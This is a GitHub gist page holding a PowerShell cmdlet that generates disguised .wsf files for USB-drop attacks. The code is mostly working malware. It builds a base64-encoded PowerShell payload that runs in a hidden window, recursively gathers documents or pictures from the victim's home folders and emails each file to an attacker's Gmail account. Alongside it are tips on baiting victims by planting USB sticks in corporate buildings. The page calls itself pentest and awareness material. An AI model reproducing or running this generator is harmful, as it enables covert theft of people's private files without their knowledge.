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Last active May 8, 2020 03:49
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  • Save SadProcessor/e6aec7e41c33841fc33341f9154aac15 to your computer and use it in GitHub Desktop.
Save SadProcessor/e6aec7e41c33841fc33341f9154aac15 to your computer and use it in GitHub Desktop.
Generate nefarious powershell wrapped in .wsf for USB-Drop Attacks. Will harvest all files with specified extensions from specified folders and send them to specified Gmail account.
____ _ _ ___ _ _ _
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|_| |_/__/_||_|___/\__|_\__|_\_\/__/.v1
"Life is like a box of FishSticks, you never know what you're gonna get..."
Benjamin Buford "Bubba" Blue - 1965.
[Shrimping Legend]
# Category: Security Awareness / PenTests / Phishing Campaigns.
This Cmdlet generates a nefarious base64 encoded powershell command wrapped in a .wsf file used
to demonstrate 'Mystery Phishing' Attacks (aka USB-Drop Attacks).
-> A subtle mix between X-mas Eve & Fishing with Dynamite...
When file clicked:
- Collects all files with specified -Extensions from specified -Folder (recursively) on victim's machine
- Exfils all collected files to the specified attacker's -Gmail/-Password.
Attacker simply has to wait... Nothing noticable on victim's side, the file just doesn't open.
Can aslo generate only the raw base64 encoded scriptblock or a ready-to-run Powershell command,
and output to Clipboard instead of File.
# Tip1: Serve FishSticks with Fresh Salad / Garlic Sauce / Lemon slice / French Fries... You're the Chef.
-> Add other 'legit' files to usb. Rename attractively. Use imagination to increase click rate... Its all about storytelling.
# Tip2: Not all fish swim in the same ponds... Choose your spot.
-> Drop in men toilets of fancy business hotel / corporate building = high profile victims.
# Note: Mostly for random target attacks, but can also be used against specific victim (requires more social engineering)
# Tech: Requires Powershell v4+ on target machine (w81+).
# Author: Walter Legowski aka @SadProcessor
# Demo:
New-FishStick -Gmail '' -Password 'ThrowAwayPassword'
Outputs .wsf to File -> Collects all .docx .pdf and .txt from victim's Desktop and subs, then sends to specified Gmail/Password.
New-FishStick -Gmail '' -Password 'ThrowAwayPassword' -TargetFolder All -Extensions 'pptx','docx','xlsx','pdf'
Outputs .wsf to File -> Collects all .pptx .docx .xlsx and .pdf from victim's Home folder and subs, then sends to specified Gmail/Password.
New-FishStick -Gmail '' -Password 'ThrowAwayPassword' -TargetFolder Pictures -Extensions 'jpg','png' -Output Raw64 -To Clipboard
Outputs Raw base64 Scriptblock to Clipboard -> Collects all .jpg and .png from victim's Pictures folder and subs, then sends to specified Gmail/Password.
function New-FishStick{
# Mandatory: Specify attacker -Gmail address for file collection
# Mandatory: Specify -Password for that Gmail account <------------/!\ Not Secure /!\
# Specify -TargetFolder Desktop|Documents|Downloads|Pictures|All
# #Default is Desktop, All is $env:HOMEPATH
[Parameter(Mandatory=$false)][ValidateSet('Desktop','Documents','Downloads','Pictures','All')][string]$TargetFolder = 'Desktop',
# Specify targeted file -Extentions
# # Letters only ex: 'pptx','docx','xlsx','pdf'
# # Default is 'docx','pdf','txt'
[Parameter(Mandatory=$false)][string[]]$Extensions = ('docx','pdf','txt'),
# Specify -Output Raw64|Com64|wsf
# # Default is wsf
[Parameter(Mandatory=$false)][ValidateSet('Raw64','Com64','wsf')][string]$Output = 'wsf',
# Specify -To File|Clipboard
# #Default is File
[Parameter(Mandatory=$false)][ValidateSet('File','Clipboard')][string]$To = 'File'
### Action
## Generate base64 encoded Scriptblock
# Fix -Folder to path
$Target = $Targetfolder
if($TargetFolder -eq 'All'){$Target = ''}
$Folder = "`$env:HOMEPATH\$Target"
# Fix extensions string syntax
$ExtString = ''
foreach($ex in $Extensions){$ExtString += "'*.$Ex',"}
# Remove last comma
$ExtString = $ExtString -replace .$
# Generate Textblock
$Block = @("`$a=`"$Gmail`";`$p=CoNVeRtTo-SeCUReStRInG ‘$Password’ -A -F;`$e=$ExtString;`$t=`"$Folder\*`";`$c=NeW-ObjeCT System.Management.Automation.PSCredential (`$a,`$p);`$f=(gCi `$t -R -I `$e).FullName;FOrEACh(`$x in `$f){`$zz=@{SmtpServer='';Port=587;UseSsl=`$trUE;Credential=`$c;From=`$a;To=`$a;Subject=`"`$eNv:CoMPutErnAME/`$EnV:USeRNamE`";Body=`"`$x`";Attachments=`$x};sENd-MAilMeSsaGe @zz;sLEEp -S ((-2..2 | geT-RAnDOM)+3)}")
# Convert to Base64
$B64 =[Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($block))
## -Output Raw64|Com64|wsf
# if -Output Raw64
if($Output -eq 'raw64'){
$Content = $B64
$FileName = 'FishStick_Raw64.txt'
# if -Output Com64
if($Output -eq 'Com64'){
# Generate full powershell base64 encoded command
$Content = "powershell.exe -NoP -sta -NonI -W Hidden -Enc $B64"
$FileName = 'FishStick_Com64.txt'
# if -Output wsf
if($Output -eq 'wsf'){
# Generate wsf content
$Content = @("<?xml version=`"1.0`" ?>
<script language=`"VBScript`">
<![CDATA[Dim objShell
Set objShell = WScript.CreateObject(`"WScript.Shell`")
command = `"powershell.exe -NoP -sta -NonI -W Hidden -Enc $B64`"
objShell.Run command,0
Set objShell = Nothing]]>
$FileName = './FishStick.wsf'
## -To File|Clipboard
# If -To File
If($To -eq 'File'){
# Output file
New-Item -Path "$FileName" -Value "$Content" -Force
# If -To Clipboard
If($To -eq 'Clipboard'){
# Set Clipboard
$Content | Set-Clipboard
### Done
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